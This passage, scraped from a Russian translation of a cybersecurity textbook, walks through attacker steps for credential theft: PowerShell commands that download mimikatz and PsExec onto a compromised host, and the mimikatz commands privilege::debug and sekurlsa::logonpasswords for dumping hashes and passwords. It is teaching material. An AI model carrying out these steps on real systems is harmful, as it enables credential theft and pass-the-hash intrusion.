Интернетмагазин



Download 18,66 Mb.
Pdf ko'rish
bet120/272
Sana25.02.2022
Hajmi18,66 Mb.
#290514
1   ...   116   117   118   119   120   121   122   123   ...   272
Bog'liq
Диогенес Ю., Озкайя Э. - Кибербезопасность. Стратегии атак и обороны - 2020

Рис. 6.18


136  Охота на пользовательские реквизиты 
Обратите внимание, что выполняется файл .exe. Если щелкнете гиперссылку 
для этой строки, то увидите, что этот исполняемый файл – cmd.exe, как показа-
но на рис. 6.19.
Рис. 6.19
Последний фрагмент декодирования этого отчета показывает действие 
Launch для исполняемого файла cmd.exe. 
Атака Pass-the-hash
На этом этапе у вас есть доступ к cmd.exe, и оттуда вы можете запустить Power-
Shell с помощью команды start powershell –NoExit. Причина, по которой вы хо-


Взлом реквизитов доступа пользователя 
 
137
тите запустить PowerShell, заключается в том, что вам нужно скачать mimikatz 
с GitHub.
Для этого выполните следующую команду:
Invoke-WebRequest -Uri
"https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170813/mi
mikatz_trunk.zip" -OutFile "C:tempmimikatz_trunk.zip"
Также обязательно загрузите утилиту PsExec с сайта Sysinternals, поскольку 
она понадобится вам позже.
Для этого используйте команду из той же консоли PowerShell:
Invoke-WebRequest -Uri
"https://download.sysinternals.com/files/PSTools.zip" -OutFile
"C:tempPSTools.zip"
В консоли PowerShell используйте команду expand-archive -path, чтобы из-
влечь содержимое из mimikatz_trunk.zip. Теперь можно запустить mimikatz. Од-
ним из первых шагов является проверка наличия у пользователя, запускающе-
го командную строку, привилегий администратора. Если они у него есть, при 
выполнении команды privilege::debug вы увидите результаты, показанные на 
рис. 6.20.
Рис. 6.20
Следующий шаг – сброс всех активных пользователей, служб и связанных 
с ними хешей NTLM/SHA1. Это очень важный шаг, потому что он даст вам 
представление о количестве пользователей, которых вы можете попытаться 
скомпрометировать, чтобы продолжить свою миссию.
Для этого используйте команду sekurlsa::logonpasswords (рис. 6.21).
Если на компьютере жертвы установлена какая-либо версия Windows (вплоть 
до Windows 7), можно увидеть фактический пароль в виде открытого текста. 
Причина, по которой мы говорим «может», заключается в том, что если на этом 


138  Охота на пользовательские реквизиты 
компьютере установлено обновление MS16-014, Windows принудительно уда-
лит утекшие учетные данные сессии авторизации через 30 с.
Рис. 6.21
Продвигаясь вперед, вы можете выполнить атаку, т. к. теперь у вас есть хеш. 
Атаку можно осуществить в системе Windows, используя mimikatz и утилиту 
psexec
(ту, что вы скачали ранее). В этом сценарии мы будем использовать сле-
дующую команду в качестве примера:

Download 18,66 Mb.

Do'stlaringiz bilan baham:
1   ...   116   117   118   119   120   121   122   123   ...   272




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish